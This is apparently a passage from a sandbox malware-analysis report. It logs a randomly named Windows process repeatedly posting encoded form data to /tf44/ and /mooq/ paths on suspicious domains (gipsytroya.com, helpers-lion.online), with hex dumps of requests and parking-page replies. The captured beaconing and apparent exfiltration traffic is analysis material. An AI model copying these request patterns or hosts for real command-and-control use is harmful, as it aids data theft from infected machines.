6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: 2c4<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>a48The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleit
Aug 9, 2024 08:43:11.420670033 CEST	224	IN	Data Raw: 75 6e 67 65 6e 20 65 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 Data Ascii: ungen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"
Aug 9, 2024 08:43:11.420681000 CEST	1236	IN	Data Raw: 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 52 65 73 65 72 76 69 65 72 65 6e 20 53 69 65 20 49 68 72 65 20 57 75 6e 73 63 68 64 6f 6d 61 69 6e 20 62 Data Ascii: ><table><tr><td><table><tr><td colspan="2"><h2>Reservieren Sie Ihre Wunschdomain bei Domaintechnik.at</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px" src="https://www.domaintechnik
Aug 9, 2024 08:43:11.420691013 CEST	929	IN	Data Raw: 6e 2f 67 66 78 2f 69 63 6f 6e 73 2f 63 70 2f 36 34 78 36 34 2f 73 74 61 74 73 2e 70 6e 67 22 20 61 6c 74 3d 22 53 74 61 74 69 73 74 69 6b 22 20 2f 3e 3c 2f 74 64 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 22 3e 44 61 Data Ascii: n/gfx/icons/cp/64x64/stats.png" alt="Statistik" /></td><td style="width:300px;">Das Modul Statistik bietet einen detaillierten Überblick über die Besucher Ihrer Website. Das Modul Statistik ist bei jedem Hosting Paket inkludiert.</td
Aug 9, 2024 08:43:11.424026012 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49753	91.195.240.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:16.480118036 CEST	785	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 34 50 63 70 65 68 74 4d 53 61 46 79 62 57 68 6e 43 4c 32 46 46 67 76 37 2b 38 73 4c 77 6c 50 59 56 62 42 50 38 46 78 42 44 74 6f Data Ascii: _Z1XhZu=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucP4PcpehtMSaFybWhnCL2FFgv7+8sLwlPYVbBP8FxBDto
Aug 9, 2024 08:43:17.145499945 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Fri, 09 Aug 2024 06:43:17 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49754	91.195.240.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:19.027524948 CEST	809	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 41 74 37 38 6b 65 4c 51 6c 6c 61 56 6a 42 64 72 4a 57 4f 33 49 4c 35 68 74 6f 5a 48 38 50 64 66 2f 4c 78 46 70 65 74 53 66 61 6b 67 3d 3d Data Ascii: _Z1XhZu=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVAt78keLQllaVjBdrJWO3IL5htoZH8Pdf/LxFpetSfakg==
Aug 9, 2024 08:43:19.691186905 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Fri, 09 Aug 2024 06:43:19 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49755	91.195.240.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:21.742141962 CEST	1822	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 53 44 42 4d 56 4e 4f 6a 39 49 70 50 56 39 57 65 48 7a 42 51 64 42 79 47 57 38 64 30 33 39 7a 54 6d 52 4a 62 35 32 2b 76 77 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 33 54 53 72 35 36 4b 78 46 55 33 44 44 33 6f 53 73 46 4a 73 46 39 4b 33 62 77 37 41 4b 66 59 31 67 45 31 52 31 31 4e 32 35 54 4c 44 34 61 4f 52 6e 58 43 52 59 6f 4a 52 73 4b 78 68 68 67 6b 30 51 44 41 77 55 6d 49 44 41 47 6d 59 59 44 57 [TRUNCATED] Data Ascii: _Z1XhZu=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhicrMrimSDBMVNOj9IpPV9WeHzBQdByGW8d039zTmRJb52+vw8imTSJnGMYV0/evIyXm7nMT9lPvZ9eZ8L3TSr56KxFU3DD3oSsFJsF9K3bw7AKfY1gE1R11N25TLD4aORnXCRYoJRsKxhhgk0QDAwUmIDAGmYYDW7KvX4TDQnEz4LdaLHppivUHn8ocyzywMyW7DvCt9g3rfJUt4gE9RaBoMN3yB5rZwJ1HAA5awAgiEaSSKvWcZXCY4nw4FpKNx11kKgl5OeIjljGqxwwG7GoRKYpaJjLs8fM7MlpQena0+ZCKg/BBXnNh59YIcF+E+QNdUmVW3+Q0v/6/usoXS1v5NsX8FygMUVSmvJWEuiX47WD+/EKVyIAHXAIWFmOH8+BfxGk2fMv8Vts0G4RXmfwWdURWaDtGHz+9TmLevey/greOtxM7N3/VhUEh+vs7TQRRhG4P2lhftNSf/mZfq9R3ihsdVoME/yIeXO997YdQoTcOVbRVdPFiuuXYtzl7QVWvPtroDkDUFNMunkhr4jBim1PEa0oEDiig2v0o/x7Vf2zLfROvlsDPMqFarg/LIUAq3V6civNiTwImEA0GSG3R7TUN7Gl0aRV3PZ/KipfABXSkehSOfOVHEPycLCiUUXBrcjcT3g6SWjCki1oWeSF94DBexWQeHCcjKyJh52ZO1KK4tP9MhA5cmJabQ9iHMCFJfDxA7x/Yy239BbOAU5GQlsZz3A+5K35ldB4XvIbVNADGOkELILUgLIN0F6kSez79ir6oSmh7nxkZsZItGdtwln46MMKi0xVv4qMB4MLo7HD4MnOYvnjgIBBxKe9swmN [TRUNCATED]
Aug 9, 2024 08:43:22.350914001 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Fri, 09 Aug 2024 06:43:22 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49756	91.195.240.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:24.311909914 CEST	521	OUT	GET /tf44/?_Z1XhZu=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxeruC6VSAZ3gbjbhtXBfFULxOBNiYF/KhRcXzdCdYnjqXRzee6k=&f6Gp=VzB4OR5 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.gipsytroya.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:43:24.952893019 CEST	113	IN	HTTP/1.1 439 date: Fri, 09 Aug 2024 06:43:24 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49757	194.58.112.174	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:30.115289927 CEST	800	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 52 42 38 33 49 62 4b 43 6f 51 66 34 6b 2f 52 64 68 69 31 57 79 69 69 30 73 54 56 46 56 2f 4c 66 58 36 68 4a 69 54 4e 38 41 56 6d 75 53 62 39 4f 61 33 48 72 48 4d 52 51 6a 63 45 44 76 62 36 48 52 49 34 67 43 49 6a 6e 4e 63 6a 52 47 45 6d 35 33 56 71 68 43 75 77 46 6d 62 4e 68 41 74 45 54 2f 77 4a 47 6e 61 37 59 38 58 33 6e 4e 7a 44 6c 67 6d 39 4f 45 64 41 49 2f 36 55 7a 56 52 61 74 4e 68 4f 34 71 4b 45 6d 78 30 4c 6f 41 37 75 41 46 71 72 44 33 6a 41 65 61 54 31 4f 61 32 4d 70 62 49 69 45 58 67 5a 62 4b 4e 66 78 67 6d 77 42 57 31 52 30 70 75 5a 2b 37 45 49 6d 4a 65 4b Data Ascii: _Z1XhZu=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrD3jAeaT1Oa2MpbIiEXgZbKNfxgmwBW1R0puZ+7EImJeK
Aug 9, 2024 08:43:30.815277100 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 09 Aug 2024 06:43:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 9, 2024 08:43:30.815295935 CEST	224	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1
Aug 9, 2024 08:43:30.815316916 CEST	1236	IN	Data Raw: 41 0b fd 4f f2 21 56 b4 13 3f 80 6c bb 58 08 16 91 dc 16 94 e9 a4 05 c8 7d d8 31 d3 0a 8a a1 b4 e0 1d fc 7f 40 6b cc 82 2b 34 90 7c c2 5a 60 5f 86 96 e2 ef a0 16 b4 fd e1 d7 fb 6f cc 4d d6 60 30 1e b4 da 3f 25 9f a7 66 bd c7 d6 4c 97 c9 24 b4 13 Data Ascii: AO!V?lX}1@k+4\|Z`_oM`0?%fL$?Br8!D(<a~agp#$!%@uyL:\|dt4SW \-YNG."5ly4(6iF2<$
Aug 9, 2024 08:43:30.815331936 CEST	1126	IN	Data Raw: f9 be 12 f7 14 b8 59 a8 8a e9 46 d4 3e 50 38 9a f3 56 a6 3a 5f 3f 32 f5 75 32 16 ee 39 5a 4e 67 ee 38 9b 32 10 74 33 10 e2 ea 15 77 e0 a3 01 2e a2 cc df 8d 54 30 5e 53 2e d8 df 0f ce b9 6e 45 94 65 59 54 a7 67 23 29 36 fc 00 f2 d2 18 0e fa 9f 58 Data Ascii: YF>P8V:_?2u29ZNg82t3w.T0^S.nEeYTg#)6Xtz(9~\|I&]ysR^-WELo1[r\%rC5GTI?c}uSr46\`GL,vk"cWA`^F7i%}*ejW<P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49758	194.58.112.174	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:32.642030001 CEST	824	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 72 4c 66 33 4b 68 49 6e 76 4e 37 41 56 6d 68 79 62 34 44 36 33 59 72 48 41 5a 51 6a 51 45 44 76 66 36 48 51 34 34 31 6c 6b 6b 6d 64 63 68 58 47 45 6f 33 58 56 71 68 43 75 77 46 6d 2f 7a 68 45 4a 45 54 50 41 4a 47 47 61 34 51 63 58 6f 67 4e 7a 44 68 67 6d 68 4f 45 64 75 49 37 36 2b 7a 54 64 61 74 4d 52 4f 37 37 4b 44 78 68 30 4e 6d 67 36 50 4e 41 4c 45 45 46 32 32 42 59 43 57 59 62 4c 75 73 74 4a 34 59 6b 67 36 4a 61 74 64 78 69 2b 43 42 32 31 37 32 70 57 5a 73 73 49 76 70 39 37 70 56 75 4f 4d 42 57 5a 30 2f 34 72 31 50 